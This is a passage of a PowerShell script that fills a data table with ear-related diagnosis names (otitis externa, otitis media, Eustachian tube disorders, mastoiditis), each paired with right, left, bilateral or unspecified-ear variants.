externa","Unspecified acute noninfective otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified acute noninfective otitis externa","Unspecified acute noninfective otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute actinic otitis externa","Acute actinic otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Acute actinic otitis externa","Acute actinic otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Acute actinic otitis externa","Acute actinic otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Acute actinic otitis externa","Acute actinic otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute chemical otitis externa","Acute chemical otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Acute chemical otitis externa","Acute chemical otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Acute chemical otitis externa","Acute chemical otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Acute chemical otitis externa","Acute chemical otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute contact otitis externa","Acute contact otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Acute contact otitis externa","Acute contact otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Acute contact otitis externa","Acute contact otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Acute contact otitis externa","Acute contact otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute eczematoid otitis externa","Acute eczematoid otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Acute eczematoid otitis externa","Acute eczematoid otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Acute eczematoid otitis externa","Acute eczematoid otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Acute eczematoid otitis externa","Acute eczematoid otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute reactive otitis externa","Acute reactive otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Acute reactive otitis externa","Acute reactive otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Acute reactive otitis externa","Acute reactive otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Acute reactive otitis externa","Acute reactive otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other noninfective acute otitis externa","Other noninfective acute otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Other noninfective acute otitis externa","Other noninfective acute otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Other noninfective acute otitis externa","Other noninfective acute otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Other noninfective acute otitis externa","Other noninfective acute otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified chronic otitis externa","Unspecified chronic otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified chronic otitis externa","Unspecified chronic otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified chronic otitis externa","Unspecified chronic otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified chronic otitis externa","Unspecified chronic otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Other otitis externa","Other otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Other otitis externa","Other otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Other otitis externa","Other otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Other otitis externa","Other otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified otitis externa","Unspecified otitis externa, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified otitis externa","Unspecified otitis externa, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified otitis externa","Unspecified otitis externa, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified otitis externa","Unspecified otitis externa, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified perichondritis of external ear","Unspecified perichondritis of right external ear") + $null = $DiagnosisList.Rows.Add("Unspecified perichondritis of external ear","Unspecified perichondritis of left external ear") + $null = $DiagnosisList.Rows.Add("Unspecified perichondritis of external ear","Unspecified perichondritis of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified perichondritis of external ear","Unspecified perichondritis of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute perichondritis of external ear","Acute perichondritis of right external ear") + $null = $DiagnosisList.Rows.Add("Acute perichondritis of external ear","Acute perichondritis of left external ear") + $null = $DiagnosisList.Rows.Add("Acute perichondritis of external ear","Acute perichondritis of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Acute perichondritis of external ear","Acute perichondritis of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic perichondritis of external ear","Chronic perichondritis of right external ear") + $null = $DiagnosisList.Rows.Add("Chronic perichondritis of external ear","Chronic perichondritis of left external ear") + $null = $DiagnosisList.Rows.Add("Chronic perichondritis of external ear","Chronic perichondritis of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic perichondritis of external ear","Chronic perichondritis of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chondritis of external ear","Chondritis of right external ear") + $null = $DiagnosisList.Rows.Add("Chondritis of external ear","Chondritis of left external ear") + $null = $DiagnosisList.Rows.Add("Chondritis of external ear","Chondritis of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Chondritis of external ear","Chondritis of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified noninfective disorders of pinna","Unspecified noninfective disorders of pinna, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified noninfective disorders of pinna","Unspecified noninfective disorders of pinna, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified noninfective disorders of pinna","Unspecified noninfective disorders of pinna, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified noninfective disorders of pinna","Unspecified noninfective disorders of pinna, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acquired deformity of pinna","Acquired deformity of pinna, right ear") + $null = $DiagnosisList.Rows.Add("Acquired deformity of pinna","Acquired deformity of pinna, left ear") + $null = $DiagnosisList.Rows.Add("Acquired deformity of pinna","Acquired deformity of pinna, bilateral") + $null = $DiagnosisList.Rows.Add("Acquired deformity of pinna","Acquired deformity of pinna, unspecified ear") + $null = $DiagnosisList.Rows.Add("Hematoma of pinna","Hematoma of pinna, right ear") + $null = $DiagnosisList.Rows.Add("Hematoma of pinna","Hematoma of pinna, left ear") + $null = $DiagnosisList.Rows.Add("Hematoma of pinna","Hematoma of pinna, bilateral") + $null = $DiagnosisList.Rows.Add("Hematoma of pinna","Hematoma of pinna, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of pinna","Noninfective disorders of pinna, right ear") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of pinna","Noninfective disorders of pinna, left ear") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of pinna","Noninfective disorders of pinna, bilateral") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of pinna","Noninfective disorders of pinna, unspecified ear") + $null = $DiagnosisList.Rows.Add("Impacted cerumen","Impacted cerumen, unspecified ear") + $null = $DiagnosisList.Rows.Add("Impacted cerumen","Impacted cerumen, right ear") + $null = $DiagnosisList.Rows.Add("Impacted cerumen","Impacted cerumen, left ear") + $null = $DiagnosisList.Rows.Add("Impacted cerumen","Impacted cerumen, bilateral") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal, unspecified","Acquired stenosis of right external ear canal, unspecified") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal, unspecified","Acquired stenosis of left external ear canal, unspecified") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal, unspecified","Acquired stenosis of external ear canal, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal, unspecified","Acquired stenosis of external ear canal, unspecified, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to trauma","Acquired stenosis of right external ear canal secondary to trauma") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to trauma","Acquired stenosis of left external ear canal secondary to trauma") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to trauma","Acquired stenosis of external ear canal secondary to trauma, bilateral") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to trauma","Acquired stenosis of external ear canal secondary to trauma, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to inflammation and infection","Acquired stenosis of right external ear canal secondary to inflammation and infection") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to inflammation and infection","Acquired stenosis of left external ear canal secondary to inflammation and infection") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to inflammation and infection","Acquired stenosis of external ear canal secondary to inflammation and infection, bilateral") + $null = $DiagnosisList.Rows.Add("Acquired stenosis of external ear canal secondary to inflammation and infection","Acquired stenosis of external ear canal secondary to inflammation and infection, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other acquired stenosis of external ear canal","Other acquired stenosis of right external ear canal") + $null = $DiagnosisList.Rows.Add("Other acquired stenosis of external ear canal","Other acquired stenosis of left external ear canal") + $null = $DiagnosisList.Rows.Add("Other acquired stenosis of external ear canal","Other acquired stenosis of external ear canal, bilateral") + $null = $DiagnosisList.Rows.Add("Other acquired stenosis of external ear canal","Other acquired stenosis of external ear canal, unspecified ear") + $null = $DiagnosisList.Rows.Add("Exostosis of external canal","Exostosis of right external canal") + $null = $DiagnosisList.Rows.Add("Exostosis of external canal","Exostosis of left external canal") + $null = $DiagnosisList.Rows.Add("Exostosis of external canal","Exostosis of external canal, bilateral") + $null = $DiagnosisList.Rows.Add("Exostosis of external canal","Exostosis of external canal, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of external ear","Other specified disorders of right external ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of external ear","Other specified disorders of left external ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of external ear","Other specified disorders of external ear, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of external ear","Other specified disorders of external ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Disorder of external ear, unspecified","Disorder of external ear, unspecified, unspecified ear") + $null = $DiagnosisList.Rows.Add("Disorder of external ear, unspecified","Disorder of right external ear, unspecified") + $null = $DiagnosisList.Rows.Add("Disorder of external ear, unspecified","Disorder of left external ear, unspecified") + $null = $DiagnosisList.Rows.Add("Disorder of external ear, unspecified","Disorder of external ear, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Otitis externa in other diseases classified elsewhere","Otitis externa in other diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Otitis externa in other diseases classified elsewhere","Otitis externa in other diseases classified elsewhere, right ear") + $null = $DiagnosisList.Rows.Add("Otitis externa in other diseases classified elsewhere","Otitis externa in other diseases classified elsewhere, left ear") + $null = $DiagnosisList.Rows.Add("Otitis externa in other diseases classified elsewhere","Otitis externa in other diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Other disorders of external ear in diseases classified elsewhere","Other disorders of right external ear in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other disorders of external ear in diseases classified elsewhere","Other disorders of left external ear in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other disorders of external ear in diseases classified elsewhere","Other disorders of external ear in diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Other disorders of external ear in diseases classified elsewhere","Other disorders of external ear in diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, recurrent, right ear") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, recurrent, left ear") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, recurrent, bilateral") + $null = $DiagnosisList.Rows.Add("Acute serous otitis media","Acute serous otitis media, recurrent, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), right ear") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), left ear") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), bilateral") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), recurrent, right ear") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), recurrent, left ear") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), recurrent, bilateral") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), recurrent, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous)","Acute and subacute allergic otitis media (mucoid) (sanguinous) (serous), unspecified ear") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media, recurrent, right ear") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media, recurrent, left ear") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media, recurrent, bilateral") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media recurrent, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other acute nonsuppurative otitis media","Other acute nonsuppurative otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic serous otitis media","Chronic serous otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic serous otitis media","Chronic serous otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Chronic serous otitis media","Chronic serous otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Chronic serous otitis media","Chronic serous otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic mucoid otitis media","Chronic mucoid otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic mucoid otitis media","Chronic mucoid otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Chronic mucoid otitis media","Chronic mucoid otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Chronic mucoid otitis media","Chronic mucoid otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic allergic otitis media","Chronic allergic otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Chronic allergic otitis media","Chronic allergic otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Chronic allergic otitis media","Chronic allergic otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic allergic otitis media","Chronic allergic otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other chronic nonsuppurative otitis media","Other chronic nonsuppurative otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Other chronic nonsuppurative otitis media","Other chronic nonsuppurative otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Other chronic nonsuppurative otitis media","Other chronic nonsuppurative otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Other chronic nonsuppurative otitis media","Other chronic nonsuppurative otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified nonsuppurative otitis media","Unspecified nonsuppurative otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified nonsuppurative otitis media","Unspecified nonsuppurative otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified nonsuppurative otitis media","Unspecified nonsuppurative otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified nonsuppurative otitis media","Unspecified nonsuppurative otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, right ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, left ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, bilateral") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, recurrent, right ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, recurrent, left ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, recurrent, bilateral") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, recurrent, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media without spontaneous rupture of ear drum","Acute suppurative otitis media without spontaneous rupture of ear drum, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, right ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, left ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, bilateral") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, recurrent, right ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, recurrent, left ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, recurrent, bilateral") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, recurrent, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute suppurative otitis media with spontaneous rupture of ear drum","Acute suppurative otitis media with spontaneous rupture of ear drum, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic tubotympanic suppurative otitis media","Chronic tubotympanic suppurative otitis media, unspecified") + $null = $DiagnosisList.Rows.Add("Chronic tubotympanic suppurative otitis media","Chronic tubotympanic suppurative otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Chronic tubotympanic suppurative otitis media","Chronic tubotympanic suppurative otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Chronic tubotympanic suppurative otitis media","Chronic tubotympanic suppurative otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic atticoantral suppurative otitis media","Chronic atticoantral suppurative otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic atticoantral suppurative otitis media","Chronic atticoantral suppurative otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Chronic atticoantral suppurative otitis media","Chronic atticoantral suppurative otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Chronic atticoantral suppurative otitis media","Chronic atticoantral suppurative otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Other chronic suppurative otitis media","Other chronic suppurative otitis media, right ear") + $null = $DiagnosisList.Rows.Add("Other chronic suppurative otitis media","Other chronic suppurative otitis media, left ear") + $null = $DiagnosisList.Rows.Add("Other chronic suppurative otitis media","Other chronic suppurative otitis media, bilateral") + $null = $DiagnosisList.Rows.Add("Other chronic suppurative otitis media","Other chronic suppurative otitis media, unspecified ear") + $null = $DiagnosisList.Rows.Add("Suppurative otitis media, unspecified","Suppurative otitis media, unspecified, unspecified ear") + $null = $DiagnosisList.Rows.Add("Suppurative otitis media, unspecified","Suppurative otitis media, unspecified, right ear") + $null = $DiagnosisList.Rows.Add("Suppurative otitis media, unspecified","Suppurative otitis media, unspecified, left ear") + $null = $DiagnosisList.Rows.Add("Suppurative otitis media, unspecified","Suppurative otitis media, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Otitis media, unspecified","Otitis media, unspecified, unspecified ear") + $null = $DiagnosisList.Rows.Add("Otitis media, unspecified","Otitis media, unspecified, right ear") + $null = $DiagnosisList.Rows.Add("Otitis media, unspecified","Otitis media, unspecified, left ear") + $null = $DiagnosisList.Rows.Add("Otitis media, unspecified","Otitis media, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Otitis media in diseases classified elsewhere","Otitis media in diseases classified elsewhere, right ear") + $null = $DiagnosisList.Rows.Add("Otitis media in diseases classified elsewhere","Otitis media in diseases classified elsewhere, left ear") + $null = $DiagnosisList.Rows.Add("Otitis media in diseases classified elsewhere","Otitis media in diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Otitis media in diseases classified elsewhere","Otitis media in diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian salpingitis","Unspecified Eustachian salpingitis, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian salpingitis","Unspecified Eustachian salpingitis, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian salpingitis","Unspecified Eustachian salpingitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian salpingitis","Unspecified Eustachian salpingitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute Eustachian salpingitis","Acute Eustachian salpingitis, right ear") + $null = $DiagnosisList.Rows.Add("Acute Eustachian salpingitis","Acute Eustachian salpingitis, left ear") + $null = $DiagnosisList.Rows.Add("Acute Eustachian salpingitis","Acute Eustachian salpingitis, bilateral") + $null = $DiagnosisList.Rows.Add("Acute Eustachian salpingitis","Acute Eustachian salpingitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic Eustachian salpingitis","Chronic Eustachian salpingitis, right ear") + $null = $DiagnosisList.Rows.Add("Chronic Eustachian salpingitis","Chronic Eustachian salpingitis, left ear") + $null = $DiagnosisList.Rows.Add("Chronic Eustachian salpingitis","Chronic Eustachian salpingitis, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic Eustachian salpingitis","Chronic Eustachian salpingitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified obstruction of Eustachian tube","Unspecified obstruction of Eustachian tube, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified obstruction of Eustachian tube","Unspecified obstruction of Eustachian tube, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified obstruction of Eustachian tube","Unspecified obstruction of Eustachian tube, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified obstruction of Eustachian tube","Unspecified obstruction of Eustachian tube, unspecified ear") + $null = $DiagnosisList.Rows.Add("Osseous obstruction of Eustachian tube","Osseous obstruction of Eustachian tube, right ear") + $null = $DiagnosisList.Rows.Add("Osseous obstruction of Eustachian tube","Osseous obstruction of Eustachian tube, left ear") + $null = $DiagnosisList.Rows.Add("Osseous obstruction of Eustachian tube","Osseous obstruction of Eustachian tube, bilateral") + $null = $DiagnosisList.Rows.Add("Osseous obstruction of Eustachian tube","Osseous obstruction of Eustachian tube, unspecified ear") + $null = $DiagnosisList.Rows.Add("Intrinsic cartilagenous obstruction of Eustachian tube","Intrinsic cartilagenous obstruction of Eustachian tube, right ear") + $null = $DiagnosisList.Rows.Add("Intrinsic cartilagenous obstruction of Eustachian tube","Intrinsic cartilagenous obstruction of Eustachian tube, left ear") + $null = $DiagnosisList.Rows.Add("Intrinsic cartilagenous obstruction of Eustachian tube","Intrinsic cartilagenous obstruction of Eustachian tube, bilateral") + $null = $DiagnosisList.Rows.Add("Intrinsic cartilagenous obstruction of Eustachian tube","Intrinsic cartilagenous obstruction of Eustachian tube, unspecified ear") + $null = $DiagnosisList.Rows.Add("Extrinsic cartilagenous obstruction of Eustachian tube","Extrinsic cartilagenous obstruction of Eustachian tube, right ear") + $null = $DiagnosisList.Rows.Add("Extrinsic cartilagenous obstruction of Eustachian tube","Extrinsic cartilagenous obstruction of Eustachian tube, left ear") + $null = $DiagnosisList.Rows.Add("Extrinsic cartilagenous obstruction of Eustachian tube","Extrinsic cartilagenous obstruction of Eustachian tube, bilateral") + $null = $DiagnosisList.Rows.Add("Extrinsic cartilagenous obstruction of Eustachian tube","Extrinsic cartilagenous obstruction of Eustachian tube, unspecified ear") + $null = $DiagnosisList.Rows.Add("Patulous Eustachian tube","Patulous Eustachian tube, unspecified ear") + $null = $DiagnosisList.Rows.Add("Patulous Eustachian tube","Patulous Eustachian tube, right ear") + $null = $DiagnosisList.Rows.Add("Patulous Eustachian tube","Patulous Eustachian tube, left ear") + $null = $DiagnosisList.Rows.Add("Patulous Eustachian tube","Patulous Eustachian tube, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of Eustachian tube","Other specified disorders of Eustachian tube, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of Eustachian tube","Other specified disorders of Eustachian tube, right ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of Eustachian tube","Other specified disorders of Eustachian tube, left ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of Eustachian tube","Other specified disorders of Eustachian tube, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian tube disorder","Unspecified Eustachian tube disorder, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian tube disorder","Unspecified Eustachian tube disorder, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian tube disorder","Unspecified Eustachian tube disorder, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified Eustachian tube disorder","Unspecified Eustachian tube disorder, bilateral") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis without complications","Acute mastoiditis without complications, right ear") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis without complications","Acute mastoiditis without complications, left ear") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis without complications","Acute mastoiditis without complications, bilateral") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis without complications","Acute mastoiditis without complications, unspecified ear") + $null = $DiagnosisList.Rows.Add("Subperiosteal abscess of mastoid","Subperiosteal abscess of mastoid, right ear") + $null = $DiagnosisList.Rows.Add("Subperiosteal abscess of mastoid","Subperiosteal abscess of mastoid, left ear") + $null = $DiagnosisList.Rows.Add("Subperiosteal abscess of mastoid","Subperiosteal abscess of mastoid, bilateral") + $null = $DiagnosisList.Rows.Add("Subperiosteal abscess of mastoid","Subperiosteal abscess of mastoid, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis with other complications","Acute mastoiditis with other complications, right ear") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis with other complications","Acute mastoiditis with other complications, left ear") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis with other complications","Acute mastoiditis with other complications, bilateral") + $null = $DiagnosisList.Rows.Add("Acute mastoiditis with other complications","Acute mastoiditis with other complications, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic mastoiditis","Chronic mastoiditis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic mastoiditis","Chronic mastoiditis, right ear") + $null = $DiagnosisList.Rows.Add("Chronic mastoiditis","Chronic mastoiditis, left ear") + $null = $DiagnosisList.Rows.Add("Chronic mastoiditis","Chronic mastoiditis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified petrositis","Unspecified petrositis, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified petrositis","Unspecified petrositis, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified petrositis","Unspecified petrositis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified petrositis","Unspecified petrositis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acute petrositis","Acute petrositis, right ear") + $null = $DiagnosisList.Rows.Add("Acute petrositis","Acute petrositis, left ear") + $null = $DiagnosisList.Rows.Add("Acute petrositis","Acute petrositis, bilateral") + $null = $DiagnosisList.Rows.Add("Acute petrositis","Acute petrositis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic petrositis","Chronic petrositis, right ear") + $null = $DiagnosisList.Rows.Add("Chronic petrositis","Chronic petrositis, left ear") + $null = $DiagnosisList.Rows.Add("Chronic petrositis","Chronic petrositis, bilateral") + $null = $DiagnosisList.Rows.Add("Chronic petrositis","Chronic petrositis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Postauricular fistula","Postauricular fistula, right ear") + $null = $DiagnosisList.Rows.Add("Postauricular fistula","Postauricular fistula, left ear") + $null = $DiagnosisList.Rows.Add("Postauricular fistula","Postauricular fistula, bilateral") + $null = $DiagnosisList.Rows.Add("Postauricular fistula","Postauricular fistula, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other mastoiditis and related conditions","Other mastoiditis and related conditions, right ear") + $null = 